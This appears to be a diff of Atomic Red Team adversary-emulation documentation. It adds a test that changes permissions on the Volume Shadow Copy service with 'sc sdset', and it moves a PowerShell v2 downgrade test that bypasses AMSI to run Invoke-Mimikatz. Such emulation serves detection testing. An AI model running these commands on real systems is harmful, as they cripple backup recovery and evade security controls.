+        command: 'sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)
+
+          '
+        cleanup_command: 'sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
+
+          '
  T1561.001:
    technique:
      modified: '2023-04-12T23:42:59.868Z'
@@ -32,27 +32,25 @@ PowerShell commands/scripts can also be executed without directly invoking the <

 - [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)

- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
+- [Atomic Test #12 - NTFS Alternate Data Stream Access](#atomic-test-12---ntfs-alternate-data-stream-access)

- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
+- [Atomic Test #13 - PowerShell Session Creation and Use](#atomic-test-13---powershell-session-creation-and-use)

- [Atomic Test #14 - PowerShell Session Creation and Use](#atomic-test-14---powershell-session-creation-and-use)
+- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations)

- [Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-15---athpowershellcommandlineparameter--command-parameter-variations)
+- [Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-15---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments)

- [Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-16---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments)
+- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations)

- [Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-17---athpowershellcommandlineparameter--encodedcommand-parameter-variations)
+- [Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-17---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments)

- [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments)
+- [Atomic Test #18 - PowerShell Command Execution](#atomic-test-18---powershell-command-execution)

- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution)
+- [Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-19---powershell-invoke-known-malicious-cmdlets)

- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets)
+- [Atomic Test #20 - PowerUp Invoke-AllChecks](#atomic-test-20---powerup-invoke-allchecks)

- [Atomic Test #21 - PowerUp Invoke-AllChecks](#atomic-test-21---powerup-invoke-allchecks)
-
- [Atomic Test #22 - Abuse Nslookup with DNS Records](#atomic-test-22---abuse-nslookup-with-dns-records)
+- [Atomic Test #21 - Abuse Nslookup with DNS Records](#atomic-test-21---abuse-nslookup-with-dns-records)


 <br/>
@@ -432,49 +430,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
 <br/>
 <br/>

-## Atomic Test #12 - PowerShell Downgrade Attack
-This test requires the manual installation of PowerShell V2.
-
-Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-powershell.exe -version 2 -Command Write-Host $PSVersion
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: PowerShell version 2 must be installed
-##### Check Prereq Commands:
-```powershell
-if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host  Automated installer not implemented yet, please install PowerShell v2 manually
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - NTFS Alternate Data Stream Access
+## Atomic Test #12 - NTFS Alternate Data Stream Access
 Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.

 **Supported Platforms:** Windows
@@ -525,7 +481,7 @@ Write-Host Prereq's for this test cannot be met automatically
 <br/>
 <br/>

-## Atomic Test #14 - PowerShell Session Creation and Use
+## Atomic Test #13 - PowerShell Session Creation and Use
 Connect to a remote powershell session and interact with the host.
 Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.

@@ -581,7 +537,7 @@ Enable-PSRemoting
 <br/>
 <br/>

-## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations
+## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations
 Executes powershell.exe with variations of the -Command parameter

 **Supported Platforms:** Windows
@@ -629,7 +585,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>

-## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
+## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
 Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied

 **Supported Platforms:** Windows
@@ -678,7 +634,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>

-## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
+## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
 Executes powershell.exe with variations of the -EncodedCommand parameter

 **Supported Platforms:** Windows
@@ -726,7 +682,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>

-## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
+## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
 Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied

 **Supported Platforms:** Windows
@@ -775,7 +731,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 <br/>
 <br/>

-## Atomic Test #19 - PowerShell Command Execution
+## Atomic Test #18 - PowerShell Command Execution
 Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.

 **Supported Platforms:** Windows
@@ -808,7 +764,7 @@ powershell.exe -e  #{obfuscated_code}
 <br/>
 <br/>

-## Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets
+## Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets
 Powershell execution of known Malicious PowerShell Cmdlets

 **Supported Platforms:** Windows
@@ -845,7 +801,7 @@ foreach ($cmdlets in $malcmdlets) {
 <br/>
 <br/>

-## Atomic Test #21 - PowerUp Invoke-AllChecks
+## Atomic Test #20 - PowerUp Invoke-AllChecks
 Check for privilege escalation paths using PowerUp from PowerShellMafia

 **Supported Platforms:** Windows
@@ -875,7 +831,7 @@ Invoke-AllChecks
 <br/>
 <br/>

-## Atomic Test #22 - Abuse Nslookup with DNS Records
+## Atomic Test #21 - Abuse Nslookup with DNS Records
 Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
 [reference](https://twitter.com/jstrosch/status/1237382986557001729)

@@ -38,6 +38,8 @@ Adversaries may also delete “online” backups that are connected to their net

 - [Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume](#atomic-test-10---windows---vssadmin-resize-shadowstorage-volume)

+- [Atomic Test #11 - Modify VSS Service Permissions](#atomic-test-11---modify-vss-service-permissions)
+

 <br/>

@@ -363,4 +365,43 @@ vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%



+<br/>
+<br/>
+
+## Atomic Test #11 - Modify VSS Service Permissions
+This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
+- Deny Generic All (GA) permissions to Network Users (NU)
+- Deny GA permissions to Everyone (WD)
+- Deny GA permissions to Anonymous (AN)
+- Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL)
+- Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL
+These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges.
+A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a4420f93-5386-4290-b780-f4f66abc7070
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)
+```
+
+#### Cleanup Commands:
+```cmd
+sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
+```
+
+
+
+
+
 <br/>
@@ -12,6 +12,8 @@ Adversaries may similarly target network traffic to downgrade from an encrypted

 - [Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI](#atomic-test-2---esxi---change-vib-acceptance-level-to-communitysupported-via-esxcli)

+- [Atomic Test #3 - PowerShell Version 2 Downgrade](#atomic-test-3---powershell-version-2-downgrade)
+

 <br/>

@@ -115,4 +117,50 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O



+<br/>
+<br/>
+
+## Atomic Test #3 - PowerShell Version 2 Downgrade
+Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 47c96489-2f55-4774-a6df-39faff428f6f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| v2_command | Specify the command to execute with Version 2 | string | Invoke-Mimikatz|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+PowerShell -version 2 -command '#{v2_command}'
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if Version 2 is installed.
+##### Check Prereq Commands:
+```powershell
+$v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
+if (-not $v2_installed) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+echo "Manually install PowerShell Version 2"
+```
+
+
+
+
 <br/>